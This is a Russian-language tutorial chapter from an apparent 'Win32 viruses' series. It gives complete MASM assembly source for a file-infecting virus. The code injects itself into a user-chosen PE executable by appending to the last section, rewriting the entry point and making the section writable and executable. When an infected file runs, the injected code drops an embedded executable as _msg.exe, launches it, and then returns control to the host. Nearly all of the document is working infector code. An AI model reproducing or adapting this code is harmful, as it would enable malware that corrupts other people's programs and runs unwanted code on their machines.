
"Win32-вирусы"
9. Способность «породить» нечто полезное

Автор:_follower / TPOC

 

Теперь научим же нашу программу порождать самостоятельный exe - файл и запускать его же.
Начнем …
 

.386
.MODEL flat,stdcall
OPTION CASEMAP : NONE


include \masm32\include\windows.inc

include \masm32\include\user32.inc

include \masm32\include\kernel32.inc

include \masm32\include\comdlg32.inc

include \masm32\include\masm32.inc


includelib \masm32\lib\user32.lib

includelib \masm32\lib\kernel32.lib

includelib \masm32\lib\comdlg32.lib

includelib \masm32\lib\masm32.lib

MIN_KERNEL_SEARCH_BASE EQU 070000000h

MAX_API_STRING_LENGTH EQU 150

VIRII_SIZE EQU ( OFFSET IGI_END - OFFSET IGI_START)

ALIGN_CORRECTION EQU 000001000h

IGI_TRADEMARK EQU ('IGI')

VIRII_R_SIZE EQU 000002000h ; !!!! УВЕЛИЧИЛ ДЛИНУ КОДА УВЕЛИЧЬ ЭТУ ВЕЛИЧИНУ !!!!!

VIRII_V_SIZE EQU 000002000h

MAX EQU 255


.CONST

szError DB "Ошибка",0

szGetBaseErr DB "Ошибка в получении адреса kernel.dll",0

szCap DB ":) ",0


szCap_0 DB "CALL CreateFile is FAILED",0

szCap_1 DB "CALL GetFileSize is FAILED",0

szCap_2 DB "CALL GlobalAlloc is FAILED",0

szCap_3 DB "CALL ReadFile is FAILED",0

.DATA

filter db 'PE-executables (*.exe)',0,'*.exe',0,0

buffer db 255 dup (0)

about db 'Please Pick the Target File',0

about_f db 'Target File is ...',0


hFile DD 0

dwFsize DD 0

pMem DD 0



OpenStruct dd 76,0

dd 0

dd offset filter, 0,0,0, offset buffer, MAX, 0,0,0, offset about

dd OFN_FILEMUSTEXIST or OFN_HIDEREADONLY or OFN_EXPLORER

dd 0, 0, 0, 0, 0


cBuff DB 120 DUP (0)

VarBuff DB 0



.CODE



Main:



invoke GetOpenFileNameA, offset OpenStruct

.if eax==0

jmp _exit_

.endif

lea eax,offset buffer





push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push EAX

push NULL

CALL MessageBox


invoke CreateFile,offset buffer,\

GENERIC_WRITE or GENERIC_READ ,\;

FILE_SHARE_READ or FILE_SHARE_WRITE,\;

NULL,\

OPEN_EXISTING,\

FILE_ATTRIBUTE_NORMAL,\

NULL

.IF EAX == INVALID_HANDLE_VALUE

XOR EAX, EAX

INC EAX

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_0

push NULL

CALL MessageBox

JMP SkipFileInfection

.ENDIF

MOV hFile, EAX

PUSH 0

PUSH EAX

CALL GetFileSize

OR EAX, EAX

.IF ZERO?

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_1

push NULL

CALL MessageBox

ADD EAX, 2

JMP SkipFileAndClean1

.ENDIF

MOV dwFsize, EAX

ADD EAX, ALIGN_CORRECTION + VIRII_SIZE

PUSH EAX

PUSH GMEM_FIXED OR GMEM_ZEROINIT

CALL GlobalAlloc

OR EAX, EAX

.IF ZERO?

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_2

push NULL

CALL MessageBox

ADD EAX, 3

JMP SkipFileAndClean1

.ENDIF



MOV pMem, EAX

LEA EAX, OFFSET VarBuff

PUSH NULL

PUSH EAX

PUSH dwFsize

PUSH pMem

PUSH hFile

CALL ReadFile

.IF EAX==0

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET szCap_3

push NULL

CALL MessageBox


CALL GetLastError

push OFFSET cBuff

push eax

CALL dwtoa

push MB_ICONINFORMATION OR MB_SYSTEMMODAL

push OFFSET szCap

push OFFSET cBuff

push NULL

CALL MessageBox

.ENDIF

;---- Поищем PE сигнатуру ----

MOV ESI, pMem

CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE

.IF !ZERO?

JMP SkipFileAndClean2

.ENDIF

ADD WORD PTR SI, [ESI+03Ch]

CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE

.IF !ZERO?

JMP SkipFileAndClean2

.ENDIF



ASSUME ESI : PTR IMAGE_NT_HEADERS

;----Найдем последнюю секцию----

MOV EDI, ESI

ADD EDI, 0F8h

MOV CX, [ESI].FileHeader.NumberOfSections

.WHILE CX != 1

DEC CX

ADD EDI, SIZEOF IMAGE_SECTION_HEADER

.ENDW

ASSUME EDI : PTR IMAGE_SECTION_HEADER



; WATCOM C/C++ компилчторы устанавливают Misc.VirtualSize в 0, исправим это

.IF [EDI].Misc.VirtualSize == 0

MOV EAX, [ESI].OptionalHeader.SizeOfImage

SUB EAX, [EDI].VirtualAddress

MOV [EDI].Misc.VirtualSize, EAX

.ENDIF



;----Копируем вирусній код в файл----

MOV EAX, [EDI].PointerToRawData

ADD EAX, [EDI].SizeOfRawData

ADD EAX, pMem



PUSH ESI

PUSH EDI

MOV ECX, VIRII_SIZE

MOV ESI, OFFSET IGI_START

XCHG EAX, EDI

REP MOVSB

POP EDI

POP ESI

;----Изменим NT -заголовок ----

;-> Изменим OptionalHeader.FileAlignment

MOV [ESI].OptionalHeader.FileAlignment, 0200h

;->Увеличим ImageBase

ADD [ESI].OptionalHeader.SizeOfImage, VIRII_V_SIZE



;-> Точка входа (EntryPoint)

; сохраним оригинальную EP

MOV EAX, [EDI].SizeOfRawData

ADD EAX, [EDI].PointerToRawData

ADD EAX, pMem

ADD EAX, (OFFSET Loader_Constants - OFFSET IGI_START)

MOV EBX, [ESI].OptionalHeader.AddressOfEntryPoint

ADD EBX, [ESI].OptionalHeader.ImageBase

;Сохраним -> mov dwOEPVA,ebx

PUSH EBX

POP [EAX]



; Изменим EP

MOV EAX, [EDI].VirtualAddress

ADD EAX, [EDI].SizeOfRawData

MOV [ESI].OptionalHeader.AddressOfEntryPoint, EAX



;->Установим "Товарный знак"

MOV [ESI].FileHeader.PointerToSymbolTable, IGI_TRADEMARK



;----Изменим информацию о секции----

ADD [EDI].Misc.VirtualSize, VIRII_V_SIZE

ADD [EDI].SizeOfRawData, VIRII_R_SIZE

OR [EDI].Characteristics, 0E0000000h ; Секцию можно: читать, писать, выполнять



;---- Пишем из памяти на диск----

;установим файловый указатель записи в 0

PUSH FILE_BEGIN

PUSH NULL

PUSH 0

PUSH hFile

CALL SetFilePointer



; Найдем новый размер файла-жертвы

MOV ECX, [EDI].PointerToRawData

ADD ECX, [EDI].SizeOfRawData



; Пишем на диск

PUSH NULL

LEA EAX, OFFSET VarBuff

PUSH EAX

PUSH ECX

PUSH pMem

PUSH hFile

CALL WriteFile



ASSUME EDI : NOTHING

ASSUME ESI : NOTHING



XOR EAX, EAX



SkipFileAndClean2:

; Освободим выделенную память

PUSH EAX

PUSH pMem

CALL GlobalFree

POP EAX



SkipFileAndClean1:

; Освободим уазатели

PUSH EAX

PUSH hFile

CALL CloseHandle

POP EAX

SkipFileInfection:

invoke ExitProcess,0

IGI_START:


pushad

call delta

delta:

pop ebp

sub ebp, offset delta


push dword ptr [esp+20h]

call GetKernelBase

or EAX, EAX

jz OEPJump

mov [ebp+dwKernelBase], EAX

lea eax, [ebp+OFFSET szWinExec]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_WinExec], EAX

lea eax, [ebp+OFFSET szCloseHandle]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_CloseHandle], EAX

lea eax, [ebp+OFFSET szWriteFile]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_WriteFile], EAX

;---------------------------------------------------

lea eax, [ebp+OFFSET szDeleteFileA]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_DeleteFileA], EAX

;---------------------------------------------------

lea eax, [ebp+OFFSET szCreateFileA]

PUSH eax

PUSH [ebp+dwKernelBase]

CALL GetProcAddr

MOV [ebp+_CreateFileA], EAX

;…………………………………………………………………………………………………………………………………………………………

;invoke CreateFile,offset buffer,\

; GENERIC_WRITE or GENERIC_READ ,\;

; FILE_SHARE_READ or FILE_SHARE_WRITE,\;

; NULL,\

; OPEN_EXISTING,\

; FILE_ATTRIBUTE_NORMAL,\

; NULL


push NULL

push FILE_ATTRIBUTE_ARCHIVE

push OPEN_ALWAYS

push NULL

push FILE_SHARE_READ or FILE_SHARE_WRITE

push GENERIC_WRITE

lea eax, [ebp+OFFSET szNameEXE]

push eax

CALL [ebp+_CreateFileA]



mov [ebp+hfileEXE],EAX

;…………………………………………………………………………………………………………………………………………………………

;invoke lstrlen, addr TextBuf

;invoke WriteFile,pFile_log,ADDR TextBuf,eax,ADDR SizeReadWrite,NULL

push 0

lea eax, [ebp+OFFSET Vbuff]

push eax

mov eax, 2560

push eax

lea eax, [ebp+OFFSET _fileDAT_1]

push eax

mov EAX,[ebp+hfileEXE]

push eax

CALL [ebp+_WriteFile]

push [ebp+hfileEXE]

CALL [ebp+_CloseHandle]

push 0

lea eax, [ebp+OFFSET szNameEXE]

push eax

CALL [ebp+_WinExec]

;**************************************************************************

OEPJump:

MOV EAX, [EBP+dwOEPVA]

.IF EAX

MOV [ESP+01Ch], EAX

POPAD

JMP EAX

.ELSE

POPAD

RET

.ENDIF

GetKernelBase PROC USES EDI ESI, dwTopStack : DWORD

MOV EDI, dwTopStack

AND EDI, 0FFFF0000h

.WHILE TRUE

.IF WORD PTR [EDI] == IMAGE_DOS_SIGNATURE

MOV ESI, EDI

ADD ESI, [ESI+03Ch]

.IF DWORD PTR [ESI] == IMAGE_NT_SIGNATURE

.BREAK

.ENDIF

.ENDIF

ExceptCont:

SUB EDI, 010000h

.IF EDI < MIN_KERNEL_SEARCH_BASE

MOV EDI, 0BFF70000h

.BREAK

.ENDIF

.ENDW

XCHG EAX, EDI

RET

GetKernelBase ENDP







GetProcAddr PROC USES ESI EDI ECX EBX EDX, dwDllBase : DWORD, szApi : LPSTR

MOV ESI, dwDllBase

CMP WORD PTR [ESI], IMAGE_DOS_SIGNATURE

JNZ @@BadExit

ADD ESI, [ESI+03Ch]

CMP DWORD PTR [ESI], IMAGE_NT_SIGNATURE

JNZ @@BadExit



MOV EDI, szApi

MOV ECX, MAX_API_STRING_LENGTH

XOR AL, AL

REPNZ SCASB

MOV ECX, EDI

SUB ECX, szApi



MOV EDX, [ESI+078h]

ADD EDX, dwDllBase

ASSUME EDX : PTR IMAGE_EXPORT_DIRECTORY

MOV EBX, [EDX].AddressOfNames

ADD EBX, dwDllBase

XOR EAX, EAX

.REPEAT

MOV EDI, [EBX]

ADD EDI, dwDllBase

MOV ESI, szApi

PUSH ECX

REPZ CMPSB

.IF ZERO?

.BREAK

.ENDIF

POP ECX

ADD EBX, 4

INC EAX

.UNTIL EAX == [EDX].NumberOfNames





MOV ESI, [EDX].AddressOfNameOrdinals

ADD ESI, dwDllBase

PUSH EDX

MOV EBX, 2

XOR EDX, EDX

MUL EBX

ADD EAX, ESI

XOR ECX, ECX

MOV WORD PTR CX, [EAX]



POP EDX

MOV EDI, [EDX].AddressOfFunctions

XOR EDX, EDX

MOV EBX, 4

MOV EAX, ECX

MUL EBX

ADD EAX, dwDllBase

ADD EAX, EDI

MOV EAX, [EAX]

ADD EAX, dwDllBase

JMP @@ExitProc



ASSUME EDX : NOTHING



@@BadExit:

XOR EAX, EAX

@@ExitProc:



RET

GetProcAddr ENDP





Loader_Constants:

dwOEPVA dd 0

szLoadLibrary db "LoadLibraryA",0

szGetProcAddress db "GetProcAddress",0

szCreateFileA db "CreateFileA",0

szDeleteFileA db "DeleteFileA",0

szWriteFile db "WriteFile",0

szCloseHandle db "CloseHandle",0

szWinExec db "WinExec",0



;szUser32 db "user32",0

;szMessageBox db "MessageBoxA",0

;szInfoCap db "Добрый день, уважаемый! ",0



;szNameBAT db "1.bat",0

szNameEXE db "_msg.exe",0



hfileEXE dd 0

_CreateFileA dd 0

_DeleteFileA dd 0

_WriteFile dd 0

_CloseHandle dd 0

_WinExec dd 0



_LoadLibrary dd 0

_GetProcAddress dd 0

;_MessageBox dd 0





dwKernelBase dd 0

dwUserBase dd 0



_fileDAT_1 db 77, 90, 144, 0, 3, 0, 0, 0, 4, 0, 0, 0, 255, 255, 0, 0, 184, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 0, 0, 0, 0, 0

_fileDAT_2 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 176, 0, 0, 0

_fileDAT_3 db 14, 31, 186, 14, 0, 180, 9, 205, 33, 184, 1, 76, 205, 33, 84, 104, 105, 115, 32, 112, 114, 111, 103, 114, 97, 109, 32, 99, 97, 110, 110, 111

_fileDAT_4 db 116, 32, 98, 101, 32, 114, 117, 110, 32, 105, 110, 32, 68, 79, 83, 32, 109, 111, 100, 101, 46, 13, 13, 10, 36, 0, 0, 0, 0, 0, 0, 0

_fileDAT_5 db 93, 101, 253, 200, 25, 4, 147, 155, 25, 4, 147, 155, 25, 4, 147, 155, 151, 27, 128, 155, 17, 4, 147, 155, 229, 36, 129, 155, 24, 4, 147, 155

_fileDAT_6 db 82, 105, 99, 104, 25, 4, 147, 155, 0, 0, 0, 0, 0, 0, 0, 0, 80, 69, 0, 0, 76, 1, 3, 0, 34, 94, 113, 64, 0, 0, 0, 0

_fileDAT_7 db 0, 0, 0, 0, 224, 0, 15, 1, 11, 1, 5, 12, 0, 2, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 16, 0, 0

_fileDAT_8 db 0, 32, 0, 0, 0, 0, 64, 0, 0, 16, 0, 0, 0, 2, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0

_fileDAT_9 db 0, 64, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0, 0, 0, 16, 0, 0, 16, 0, 0

_fileDAT_10 db 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 32, 0, 0, 60, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_11 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_12 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_13 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_14 db 0, 0, 0, 0, 0, 0, 0, 0, 46, 116, 101, 120, 116, 0, 0, 0, 42, 0, 0, 0, 0, 16, 0, 0, 0, 2, 0, 0, 0, 4, 0, 0

_fileDAT_15 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32, 0, 0, 224, 46, 114, 100, 97, 116, 97, 0, 0, 146, 0, 0, 0, 0, 32, 0, 0

_fileDAT_16 db 0, 2, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 64, 46, 100, 97, 116, 97, 0, 0, 0

_fileDAT_17 db 33, 0, 0, 0, 0, 48, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 0, 0, 192

;18

_fileDAT_18 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_19 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_20 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_21 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_22 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_23 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_24 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_25 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_26 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_27 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_28 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_29 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_30 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_31 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_32 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0



;32

_fileDAT_33 db 104, 64, 16, 0, 0, 104, 0, 48, 64, 0, 104, 4, 48, 64, 0, 106, 0, 232, 8, 0, 0, 0, 106, 0, 232, 7, 0, 0, 0, 204, 255, 37

_fileDAT_34 db 8, 32, 64, 0, 255, 37, 0, 32, 64, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;35

_fileDAT_35 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_36 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_37 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_38 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_39 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_40 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_41 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_42 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_43 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_44 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_45 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_46 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_47 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_48 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0



;48

_fileDAT_49 db 118, 32, 0, 0, 0, 0, 0, 0, 92, 32, 0, 0, 0, 0, 0, 0, 84, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 106, 32, 0, 0

_fileDAT_50 db 8, 32, 0, 0, 76, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 132, 32, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_51 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 118, 32, 0, 0, 0, 0, 0, 0, 92, 32, 0, 0, 0, 0, 0, 0, 157, 1, 77, 101

_fileDAT_52 db 115, 115, 97, 103, 101, 66, 111, 120, 65, 0, 117, 115, 101, 114, 51, 50, 46, 100, 108, 108, 0, 0, 128, 0, 69, 120, 105, 116, 80, 114, 111, 99

_fileDAT_53 db 101, 115, 115, 0, 107, 101, 114, 110, 101, 108, 51, 50, 46, 100, 108, 108, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;54

_fileDAT_54 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_55 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_56 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_57 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_58 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_59 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_60 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_61 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_62 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_63 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_64 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;64

_fileDAT_65 db 58, 41, 32, 0, 46, 46, 46, 32, 224, 32, 242, 229, 239, 229, 240, 252, 32, 223, 32, 45, 32, 95, 77, 83, 71, 46, 101, 120, 101, 32, 33, 32

;66
_fileDAT_66 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_67 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_68 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_69 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_70 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_71 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_72 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_73 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_74 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_75 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_76 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_77 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_78 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_79 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

_fileDAT_80 db 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

;80
Vbuff dw 0

_exit_:
;.........................................................................................................................
IGI_END:

end Main

 

1)

VIRII_R_SIZE EQU 000002000h ; !!! УВЕЛИЧИЛ ДЛИНУ КОДА УВЕЛИЧЬ ЭТУ ВЕЛИЧИНУ
;VIRII_R_SIZE EQU 000000600h
;VIRII_R_SIZE EQU 000000200h

Снова увеличим величину VIRII_R_SIZE, мотивы в статье 8.

2)

_fileDAT_0 db …

Тут нужно разобраться с программой [1.2]. Кстати скачать ее не помешает, она с исходником, вся идея на лицо, как говорится … Программа, что не может не удивить , распознается антивирусными программами как некий FT0DAT.Genegator, что это за подвид я не знаю : )

В этом случае программа [1.1] генерирует следующий код:

f_to_dc.txt

